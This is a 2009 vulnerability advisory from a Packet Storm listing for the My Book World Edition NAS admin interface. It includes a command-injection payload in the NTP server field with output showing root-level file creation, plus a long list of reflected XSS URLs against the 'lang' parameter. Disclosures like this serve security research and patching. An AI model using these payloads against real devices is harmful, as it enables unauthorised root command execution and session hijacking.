My Book World Edition NAS Cross Site Scripting

2009-12-30T00:00:00
ID PACKETSTORM:84515
Type packetstorm
Reporter emgent
Modified 2009-12-30T00:00:00

Description

                                        
                                            `# Exploit Title: My Book World Edition NAS multiple vulnerability  
# Date: 20091230  
# Author: Emanuele 'emgent' Gentili  
# Code: http://www.backtrack.it/~emgent/exploits/20091230-NAS.txt  
# Version: 01.01.16 with MioNet 2.3.9.13 firmware.  
# CVE : N/A  
# Vendor: http://www.wdc.com/mybookworld  
  
[+] REMOTE COMMAND EXECUTION  
  
Pages:  
http://10.12.6.111/admin/e_datetime.php?lang=en  
http://10.12.6.111/admin/system_general.php?lang=en  
  
Box entry:  
NTP TIME SERVER: "pool.ntp.org && touch /tmp/pwned.txt"  
  
Output:  
~ # ls -la /tmp/ |grep pwned  
-rw-rw-rw- 1 root root 0 Dec 30 08:25 pwned.txt  
~ #  
  
  
[+] WEB SERVER DEFAULT SECURITY MISSCONFIGURATION  
  
All services and web applications run with root privileges, so exploiting  
web apps is possible run command with uid 0 privileges.  
  
  
[+] INFORMATION DISCLOSURE  
  
Browsing http://10.12.6.111/help/express.php?lang=en%22 is possible see the real path  
in the system, via xml error not blocked.  
  
  
[+] CROSS SITE SCRIPTING (XSS)  
  
A lot of XSS attacks are possible in this web application, all "?lang=" var are vulnerable.  
  
http://10.12.6.111/admin/basic_index.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/system_config_manage.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/system_alerts.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/system_index.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/system_firmware_automated.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/system_firmware_manual.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/system_general.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/shutdown_reboot.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/shutdown_reboot.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/system_advanced.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/system_generate_ssl_form.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/network_index.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/network_lan.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/network_service.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/network_workgroup_domain.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/storage_index.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/storage_disk_manage.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/storage_volume_manage.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/storage_share_manage.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/storage_usb_manage.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/storage_quota_manage.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/storage_download_manage.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/system_change_btadmin_passwd.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/storage_share_add.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/storage_share_edit.php?share=user&volume=DataVolume&md=md2&lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/media_index.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/itune_server_properties.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/access_control_index.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/access_control_shareaccess_manage.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/access_control_shareaccess_edit.php?id=1&lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/status_index.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/index.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/status_log_system.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/status_log_cifs.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/status_log_ftp.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/status_log_setting.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/e_shutdown_reboot.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/e_machine.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/e_datetime.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/e_network.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/e_user_mgmt.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/e_user_change_passwd.php?id=2&lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/e_user_mgmt.php?act=del&id=user&lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/e_user_add.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/e_share_mgmt.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/e_share_mgmt.php?type=share&act=del&share=user&volume=DataVolume&md=md2&lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/e_share_add.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/e_index.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/e_mionet.php?lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/admin/basic_index.php?action=logout&lang=en"><script>alert('XSS');</script>  
http://10.12.6.111/help/system.php?lang=en"><script>alert('XSS');</script>&page=system_summary  
and more other...  
  
`